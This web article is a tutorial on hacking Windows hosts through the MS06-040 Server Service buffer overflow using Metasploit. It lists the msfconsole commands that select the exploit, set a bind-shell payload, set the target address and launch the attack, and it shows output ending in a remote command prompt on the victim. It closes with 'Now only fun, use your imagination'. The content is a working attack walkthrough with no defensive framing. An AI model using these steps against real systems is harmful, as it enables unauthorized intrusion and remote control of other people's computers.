spacer.png, 0 kB
Members: 3195
News: 1344
Web Links: 2
We have 2 guests online

spacer.png, 0 kB
 spacer.png, 0 kB

Latest News

Popular

Home arrow All Articles arrow General Security Articles arrow .:Hacking With Metasploit & Netapi(MS06-040):.
.:Hacking With Metasploit & Netapi(MS06-040):. Print E-mail

-In this article i show how exploit a recent fail of Microsoft windows.

"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)" or "Microsoft Windows Server Service Remote Buffer Overflow Vulnerability" the names are different but is the same fail

 Related Links:

 http://www.milw0rm.com/exploits/2162 

http://www.securityfocus.com/bid/19409
- I make it very simple.

- First you have take this tools, to exploit this fail.

[Metasploit FrameWork]
http://www.metasploit.com/projects/Framework/downloads.html

[Scanner of Retina,he only scan this fail]
http://rapidshare.de/files/32048600/MS06-40.exe.html

- This tool run under Unix/Mac/Windows.

 
- In This tutorial i was using metasploit framework in windows.

- To remember (only for example): IP of my pc = 192.168.0.1, Ip of remote host = 192.168.0.2

-Begin:

- After found a host vulnerable with this fail, we pass to next step:

1º Open Metasploit Framework Console (MSFConsole):

             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


+ -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]

msf > info netapi_ms06_040
/*Here to obtain more information about this exploit*/


      Name: Microsoft CanonicalizePathName() MSO6-040 Overflow
     Class: remote
   Version: $Rev: 3819 $
 Target OS: win32, win2000, winxp, win2003
  Keywords: srvsvc
Privileged: Yes
Disclosure: Aug 08 2006

Provided By:
    H D Moore <hdm [at] metasploit.com>

Available Targets:
    (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)
    (wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4
    (wcscpy) Windows XP SP0/SP1
    (stack)  Windows XP SP1 English

Available Options:

    Exploit:    Name       Default    Description
    --------    -------    -------    ---------------------------------------

    required    RHOST                 The target address
    optional    SMBDOM                The domain for specified SMB username
    optional    SMBUSER               The SMB username to connect with
    optional    SMBPASS               The password for specified SMB username

Payload Information:
    Space: 370
    Avoid: 7 characters
   | Keys: noconn tunnel bind ws2ord reverse

Nop Information:
 SaveRegs: esp ebp
   | Keys:

Encoder Information:
   | Keys:

Description:
    This module exploits a stack overflow in the NetApi32
    CanonicalizePathName() function using the NetpwPathCanonicalize
    RPC call in the Server Service. It is likely that other RPC calls
    could be used to exploit this service. This exploit will result in
    a denial of service on on Windows XP SP2 or Windows 2003 SP1. A
    failed exploit attempt will likely result in a complete reboot on
    Windows 2000 and the termination of all SMB-related services on
    Windows XP. The default target for this exploit should succeed on
    Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.

References:
    http://www.securityfocus.com/bid/19409
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3439
    http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx


msf > use netapi_ms06_040
/*Selecting the exploit*/

msf netapi_ms06_040 > set PAYLOAD win32_bind
/*Selecting the PAYLOAD*/

PAYLOAD -> win32_bind
msf netapi_ms06_040(win32_bind) > show options
/*getting information*/

Exploit and Payload Options
===========================

  Exploit:    Name       Default    Description
  --------    -------    -------    ---------------------------------------
  required    RHOST                 The target address
  optional    SMBDOM                The domain for specified SMB username
  optional    SMBUSER               The SMB username to connect with
  optional    SMBPASS               The password for specified SMB username

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------

  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

msf netapi_ms06_040(win32_bind) > set LPORT 4444
LPORT -> 4444
/*placing the variable*/

msf netapi_ms06_040(win32_bind) > set RHOST 192.168.0.2
RHOST -> 192.168.0.2
/*here to*/

msf netapi_ms06_040(win32_bind) > set EXITFUNC thread
EXITFUNC -> thread
/*here to*/


msf netapi_ms06_040(win32_bind) > set
EXITFUNC: thread
LPORT: 4444
PAYLOAD: win32_bind
RHOST: 192.168.0.2
/*here they show the variables, that we are placed*/


- If all is Ok, now only exploit.

msf netapi_ms06_040(win32_bind) >exploit
[*]Starting Bind Handler
[*]Detected a Windows 2000 target
[*]Sending request....
[*]Got connection from 192.168.190.1:1902 <-> 192.168.190.129:4444

Microsoft Windows 2000 [Verson 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>_

- All ocurred Ok, now I am in the console of remote host.

- Now Only fun, use your imagination.

- Writed By: Linux Benutzer
- Contact: This e-mail address is being protected from spam bots, you need JavaScript enabled to view it

Related Items:
 
< Prev   Next >
[ Back ]
© 2008 DataStronghold.com
Joomla! is Free Software released under the GNU/GPL License.
 spacer.png, 0 kB
spacer.png, 0 kB
spacer.png, 0 kB
 spacer.png, 0 kB